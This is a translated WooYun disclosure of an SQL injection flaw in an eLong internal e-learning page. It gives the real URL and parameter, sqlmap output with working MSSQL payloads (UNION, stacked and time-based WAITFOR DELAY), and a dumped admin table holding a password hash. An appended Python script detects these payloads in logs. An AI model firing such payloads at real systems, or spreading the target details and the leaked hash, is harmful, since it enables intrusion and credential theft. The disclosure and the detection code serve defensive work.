Vulnerability summary

Defect ID: wooyun-2015-0103324

Title: SQL injection in a system of eLong (艺龙旅行网)

Vendor: eLong (艺龙旅行网)

Author: jianFen

Submitted: 2015-03-24 09:20

Fixed: 2015-05-09 11:04

Published: 2015-05-09 11:04

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 16

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-03-24: Details reported to the vendor; awaiting vendor handling
2015-03-25: Vendor has confirmed; details visible to the vendor only
2015-04-04: Details disclosed to core white hats and domain experts
2015-04-14: Details disclosed to regular white hats
2015-04-24: Details disclosed to intern white hats
2015-05-09: Details disclosed to the public

Brief description:

Detailed description:

Injection point:
http://elearning.corp.elong.com/Showknowledge.aspx?id=214
A delay of at least 10 s must be used, otherwise it errors out.

-dbs --time-sec 10


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=212 AND 8115=8115
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: id=-3129 UNION ALL SELECT NULL, NULL, CHAR(58)+CHAR(113)+CHAR(112)+CHAR(121)+CHAR(58)+CHAR(66)+CHAR(103)+CHAR(111)+CHAR(83)+CHAR(119)+CHAR(113)+CHAR(85)+CHAR(113)+CHAR(109)+CHAR(102)+CHAR(58)+CHAR(114)+CHAR(104)+CHAR(114)+CHAR(58), NULL, NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=212; WAITFOR DELAY '0:0:10';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=212 WAITFOR DELAY '0:0:10'--
---
Database: elonglearning
[204 tables]
Database: elonglearning
Table: dbo.vadmin
[1 entry]
+---------+-----------+----------------------------------+
| adminid | psysadmin | adminpass |
+---------+-----------+----------------------------------+
| admin | <blank> | 0146636BB87967E6A4DC4B80BE9E610F |
+---------+-----------+----------------------------------+
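As an added detection example (not part of the original report), the script below flags the payload shapes sqlmap listed above (WAITFOR DELAY, stacked queries, UNION ALL SELECT with NULL padding, CHAR()+CHAR() string building, the AND n=n tautology) in IIS-style access logs, and uses the response time to corroborate the time-based case. The log lines are constructed and the seven-field layout is an assumption.

```python
import re
from urllib.parse import unquote_plus

# Indicator regexes modelled on the payload shapes sqlmap reported for the
# "id" parameter: WAITFOR DELAY (time-based / stacked), UNION ALL SELECT with
# NULL padding, CHAR()+CHAR() string building, and the "AND n=n" tautology.
SIGNATURES = {
    "mssql-time-based": re.compile(r"waitfor\s+delay\s+'[\d:]+'", re.I),
    "stacked-query": re.compile(r";\s*(waitfor|exec|select|insert|update|delete|drop)\b", re.I),
    "union-select": re.compile(r"union\s+(all\s+)?select\b", re.I),
    "char-concat": re.compile(r"(char\(\d+\)\s*\+\s*){3,}char\(\d+\)", re.I),
    "boolean-tautology": re.compile(r"\band\s+(\d+)\s*=\s*\1\b", re.I),
}

# Constructed IIS W3C-style log lines (hypothetical, not from the report):
# date time cs-method cs-uri-stem cs-uri-query sc-status time-taken(ms)
SAMPLE_LOG = """\
2015-03-24 09:20:01 GET /Showknowledge.aspx id=214 200 31
2015-03-24 09:20:02 GET /Showknowledge.aspx id=212+AND+8115%3D8115 200 35
2015-03-24 09:20:03 GET /Showknowledge.aspx id=-3129+UNION+ALL+SELECT+NULL,NULL,CHAR(58)%2BCHAR(113)%2BCHAR(112)%2BCHAR(58),NULL,NULL-- 200 40
2015-03-24 09:20:04 GET /Showknowledge.aspx id=212;+WAITFOR+DELAY+'0:0:10';-- 200 10042
2015-03-24 09:20:15 GET /Showknowledge.aspx id=212+WAITFOR+DELAY+'0:0:10'-- 500 10031
2015-03-24 09:20:26 GET /Showknowledge.aspx id=215 200 29
"""

def scan_log(text, slow_ms=10000):
    """Return one finding per request whose decoded query string matches a signature."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 7 or line.startswith("#"):
            continue  # skip blank lines, W3C header lines and anything malformed
        date, clock, method, stem, query, status, time_taken = fields
        decoded = unquote_plus(query)  # '+' -> space, %2B -> '+', %3D -> '='
        hits = sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))
        # A WAITFOR payload whose response also took >= slow_ms is the strongest
        # signal: the injected delay was actually executed by the database.
        if "mssql-time-based" in hits and int(time_taken) >= slow_ms:
            hits.append("delay-confirmed")
        if hits:
            findings.append({"time": f"{date} {clock}", "method": method, "uri": stem,
                             "query": decoded, "status": int(status),
                             "time_taken_ms": int(time_taken), "indicators": hits})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["uri"], f["indicators"], f"{f['time_taken_ms']} ms")
```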

Proof of vulnerability:

+---------+-----------+----------------------------------+
| adminid | psysadmin | adminpass |
+---------+-----------+----------------------------------+
| admin | <blank> | 0146636BB87967E6A4DC4B80BE9E610F |
+---------+-----------+----------------------------------+
The password hash was dumped, but no attempt at it worked.
If one could log into the back end, FCK would still be easy to deal with.

Fix:

Fix the SQL injection.

Copyright notice: please credit the source when reposting. jianFen@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-03-25 11:03

Vendor reply:

Thanks to the white hat for the heads-up; we will fix it as soon as possible.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-03-24 09:40 | s3xy ( Core white hat | Rank:832 Vulnerabilities:113 | Better to forget each other in the rivers and lakes than to keep each other alive with spittle )

    mark